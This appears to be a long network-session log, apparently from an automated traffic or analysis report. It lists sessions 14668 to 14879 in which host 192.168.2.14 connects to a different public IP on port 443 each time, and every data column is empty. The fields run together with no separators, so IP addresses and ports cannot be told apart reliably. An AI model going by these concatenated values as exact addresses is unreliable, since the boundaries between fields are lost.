                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14668192.168.2.1436528107.151.122.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14669192.168.2.145230057.167.21.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14670192.168.2.1455298219.214.98.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14671192.168.2.145976453.77.64.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14672192.168.2.1440364161.136.198.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14673192.168.2.1458446116.199.51.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14674192.168.2.1457532141.235.99.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14675192.168.2.1439268165.185.0.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14676192.168.2.1459858189.219.75.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14677192.168.2.1440358118.21.119.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14678192.168.2.144338013.135.43.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14679192.168.2.1434716166.83.157.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14680192.168.2.1437182144.234.55.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14681192.168.2.1450946178.161.208.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14682192.168.2.144167417.75.2.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14683192.168.2.1437234162.23.49.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14684192.168.2.1447890181.4.64.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14685192.168.2.145093249.198.229.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14686192.168.2.143886487.14.230.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14687192.168.2.1459904112.72.78.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14688192.168.2.144357895.129.180.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14689192.168.2.143611489.168.180.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14690192.168.2.1453254134.136.221.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14691192.168.2.1445664196.59.138.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14692192.168.2.144971074.158.19.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14693192.168.2.1453668204.44.4.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14694192.168.2.1438218108.159.94.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14695192.168.2.1447246155.94.114.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14696192.168.2.1452722119.248.8.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14697192.168.2.145439431.216.214.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14698192.168.2.143583052.128.23.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14699192.168.2.145346866.45.131.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14700192.168.2.1440156198.142.35.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14701192.168.2.145990423.153.174.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14702192.168.2.1454700217.107.159.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14703192.168.2.1439838204.233.230.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14704192.168.2.1458728129.98.120.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14705192.168.2.1443668147.197.90.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14706192.168.2.143919218.199.25.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14707192.168.2.144865063.68.173.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14708192.168.2.1444796162.104.9.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14709192.168.2.145006462.116.2.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14710192.168.2.143323247.20.155.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14711192.168.2.1447104139.212.153.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14712192.168.2.1433120208.201.105.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14713192.168.2.143639245.17.193.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14714192.168.2.144655276.244.229.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14715192.168.2.14513702.7.235.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14716192.168.2.14363229.227.91.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14717192.168.2.145322648.215.219.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14718192.168.2.143924048.107.243.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14719192.168.2.145424444.128.206.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14720192.168.2.1458484167.194.250.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14721192.168.2.1459688184.102.105.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14722192.168.2.143885650.16.251.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14723192.168.2.1452882179.187.163.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14724192.168.2.143495094.23.130.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14725192.168.2.1445256180.197.172.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14726192.168.2.1457720170.166.34.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14727192.168.2.143553449.215.55.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14728192.168.2.144102268.219.37.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14729192.168.2.1442076141.101.151.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14730192.168.2.146080693.159.177.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14731192.168.2.1454466196.39.156.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14732192.168.2.1452718112.186.246.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14733192.168.2.145988298.100.136.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14734192.168.2.1456422176.65.170.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14735192.168.2.143681676.142.97.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14736192.168.2.144815872.103.212.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14737192.168.2.1460340152.126.131.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14738192.168.2.1459150110.126.2.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14739192.168.2.1460348134.131.190.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14740192.168.2.145775289.196.199.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14741192.168.2.143485852.214.15.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14742192.168.2.1446890103.189.231.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14743192.168.2.1436954119.71.18.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14744192.168.2.1445070182.215.26.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14745192.168.2.143597613.104.26.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14746192.168.2.144307813.17.8.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14747192.168.2.1438736197.105.44.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14748192.168.2.1459236150.243.204.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14749192.168.2.1433778197.157.158.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14750192.168.2.143914292.59.76.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14751192.168.2.14518985.74.158.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14752192.168.2.1442504141.203.147.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14753192.168.2.1452908141.70.83.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14754192.168.2.143699881.151.114.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14755192.168.2.143491077.130.58.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14756192.168.2.1439766103.129.146.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14757192.168.2.1456160154.90.179.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14758192.168.2.1447810181.122.122.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14759192.168.2.143954847.137.12.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14760192.168.2.1454200161.169.20.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14761192.168.2.1452934154.101.253.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14762192.168.2.144372650.131.229.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14763192.168.2.1457036169.41.53.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14764192.168.2.1458650135.232.158.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14765192.168.2.146053686.61.26.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14766192.168.2.143637065.239.224.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14767192.168.2.1438900139.248.23.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14768192.168.2.1440940103.33.167.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14769192.168.2.1449816197.107.137.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14770192.168.2.1444544139.150.187.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14771192.168.2.1440488148.138.213.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14772192.168.2.144617451.55.33.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14773192.168.2.1453740143.58.19.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14774192.168.2.144205442.87.77.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14775192.168.2.1442768162.169.175.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14776192.168.2.1433728114.184.19.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14777192.168.2.1444810157.142.120.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14778192.168.2.1460506136.20.154.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14779192.168.2.145855835.211.241.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14780192.168.2.1460216206.6.139.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14781192.168.2.1441552156.246.48.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14782192.168.2.1435668128.228.207.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14783192.168.2.1453834149.55.73.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14784192.168.2.145189661.70.218.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14785192.168.2.144318236.141.96.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14786192.168.2.144120069.190.83.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14787192.168.2.145618224.130.113.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14788192.168.2.1451054153.189.218.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14789192.168.2.1448336144.94.5.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14790192.168.2.143386849.210.244.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14791192.168.2.1439850170.115.153.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14792192.168.2.1447874133.157.161.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14793192.168.2.143525014.93.107.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14794192.168.2.145837891.172.180.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14795192.168.2.1444418218.173.170.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14796192.168.2.14428389.166.196.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14797192.168.2.143356675.148.118.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14798192.168.2.143884863.238.204.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14799192.168.2.145848259.120.197.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14800192.168.2.144074057.32.59.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14801192.168.2.143775296.228.106.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14802192.168.2.143389667.22.18.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14803192.168.2.1443760163.230.162.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14804192.168.2.1434118181.124.237.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14805192.168.2.144961059.19.140.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14806192.168.2.1434440183.69.54.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14807192.168.2.1456384172.121.113.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14808192.168.2.1457836223.129.224.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14809192.168.2.145903865.2.249.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14810192.168.2.143497288.165.23.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14811192.168.2.145836092.61.222.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14812192.168.2.1438746126.63.112.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14813192.168.2.1459086154.83.7.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14814192.168.2.143546020.211.148.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14815192.168.2.145622425.9.235.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14816192.168.2.1433242172.248.215.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14817192.168.2.143471835.236.152.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14818192.168.2.145526051.245.103.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14819192.168.2.144624664.55.179.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14820192.168.2.1443802222.141.143.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14821192.168.2.145886612.154.137.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14822192.168.2.1441554149.134.138.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14823192.168.2.1457562125.14.200.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14824192.168.2.1445836196.89.163.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14825192.168.2.1454038196.43.143.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14826192.168.2.1443458139.170.154.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14827192.168.2.144682820.27.49.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14828192.168.2.1437504153.31.74.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14829192.168.2.1458064135.33.218.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14830192.168.2.1448720110.107.83.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14831192.168.2.144384260.152.68.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14832192.168.2.1437748124.134.139.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14833192.168.2.1434714179.183.85.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14834192.168.2.1454250195.38.97.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14835192.168.2.1439254164.172.210.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14836192.168.2.1443454118.3.66.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14837192.168.2.143501896.8.17.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14838192.168.2.1460378166.202.33.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14839192.168.2.1460546110.225.191.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14840192.168.2.1443746145.66.126.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14841192.168.2.1437572147.178.44.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14842192.168.2.1453828197.247.109.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14843192.168.2.145293641.62.138.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14844192.168.2.1456524118.98.225.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14845192.168.2.1441764220.206.178.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14846192.168.2.1460880195.35.194.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14847192.168.2.144543482.191.128.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14848192.168.2.1440950210.85.155.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14849192.168.2.145182892.136.192.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14850192.168.2.144683877.242.93.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14851192.168.2.145121812.71.7.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14852192.168.2.143414693.228.153.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14853192.168.2.1457294204.126.12.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14854192.168.2.144034419.245.75.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14855192.168.2.1434718184.6.222.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14856192.168.2.143918072.149.223.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14857192.168.2.143996458.177.79.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14858192.168.2.1432920203.234.88.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14859192.168.2.1446626198.248.136.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14860192.168.2.1447548121.12.85.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14861192.168.2.144403648.42.19.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14862192.168.2.143760866.175.226.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14863192.168.2.144266824.155.228.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14864192.168.2.143699287.247.128.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14865192.168.2.1442282173.101.189.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14866192.168.2.1457676112.223.120.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14867192.168.2.1443604176.235.106.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14868192.168.2.1438088157.217.15.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14869192.168.2.1458154100.28.117.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14870192.168.2.1440734140.108.206.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14871192.168.2.1451742129.143.21.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14872192.168.2.1454564103.94.183.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14873192.168.2.144723031.162.159.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14874192.168.2.1455556223.185.26.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14875192.168.2.143939878.187.215.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14876192.168.2.1447288102.74.248.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14877192.168.2.144466480.153.43.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14878192.168.2.1438566221.187.10.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14879192.168.2.146083244.99.71.239443
                                                        TimestampBytes transferredDirectionData


